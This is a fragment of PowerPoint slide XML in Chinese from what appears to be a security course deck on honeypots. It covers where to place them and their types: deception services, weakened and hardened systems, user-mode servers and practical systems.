                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>未使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   位置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>DMZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>区域</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   位置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>：内部网络，可以捕捉内部攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>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86B979D2-E5BE-4F4C-86F1-EE55138C6B9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蜜罐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>诱骗服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183299" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A8DE65-F2F5-4C5B-88DC-E984C29671E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>诱骗服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(Deception Service)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>诱骗服务是指在特定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务端口上侦听并像其他应用程序那样应答各种网络请求。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DTK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>需要精心设计和配置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>诱骗服务只能收集有限的信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有一定风险</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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C6837346-E8E8-4EA8-B952-46A9EEBBA42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蜜罐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>弱化系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185347" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CED3C66-93C2-4CD4-89BE-4B6965A1FD99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182688" y="2017713"/>
            <a:ext cx="7772400" cy="4435475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>弱化系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>(Weakened System) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>弱化系统是一个配置有已知攻击弱点的操作系统，这样使攻击者更加容易进入系统，系统可以收集有效的攻击数据。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提供的是攻击者试图入侵的实际服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>高维护低收益</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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72D4D9AF-727C-4535-B2DD-8E298B3DEA22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蜜罐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>强化系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187395" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19F0170C-B716-4C0D-BBB9-B5F2C7791BB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182688" y="2017713"/>
            <a:ext cx="7772400" cy="4435475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>强化系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(Hardened System)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>强化系统同弱化系统一样，提供一个真实的环境，是对弱化系统的改进</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>能在最短的时间内收集最多的有效数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>需要系统管理员具有更高的专业技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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200E947F-1A9F-4EB1-8B53-EC2EF0E2C1FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蜜罐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>用户模式服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189443" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FC8CD45-A3C1-4E35-81DF-5AA70837E077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182688" y="2017713"/>
            <a:ext cx="7772400" cy="4840287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>用户模式服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>(User Mode Server) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户模式服务器实际上是一个用户进程，它运行在主机上，并且模拟成一个真实的服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>这种模式的成功与否取决于攻击者的进入程度和受骗程度。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统管理员对用户主机有绝对的控制权</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不适用于所有的操作系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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A379E8A1-AFEB-4C35-B917-1DEE3CF03C64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蜜罐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>用户模式服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="191491" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6FE1C9D-36BD-4B95-931B-C5D3F09501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155825"/>
            <a:ext cx="69850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A379E8A1-AFEB-4C35-B917-1DEE3CF03C64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蜜罐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>实用系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A472A8B-6A99-416A-A0CC-38497135C3F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2276872"/>
            <a:ext cx="9144000" cy="3785706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320042529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8EA66378-21DB-43F8-86CC-4AEECC6E20EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.10 Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24579" name="Picture 2" descr="http://images.cnitblog.com/blog/405877/201308/10184630-282e829d31cf4221beb7c2ed327f9993.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A9C87C3-31B9-4D22-BC7C-D4B3B1532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738" y="765175"/>
            <a:ext cx="795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A379E8A1-AFEB-4C35-B917-1DEE3CF03C64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蜜罐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>实用系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{443277D6-15A8-4709-9509-363C5A4CA26E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="1955860"/>
            <a:ext cx="8208912" cy="4871163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1234029387"/>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96610" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{002F0263-A8CE-4754-81AE-CA8D40F8BAF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
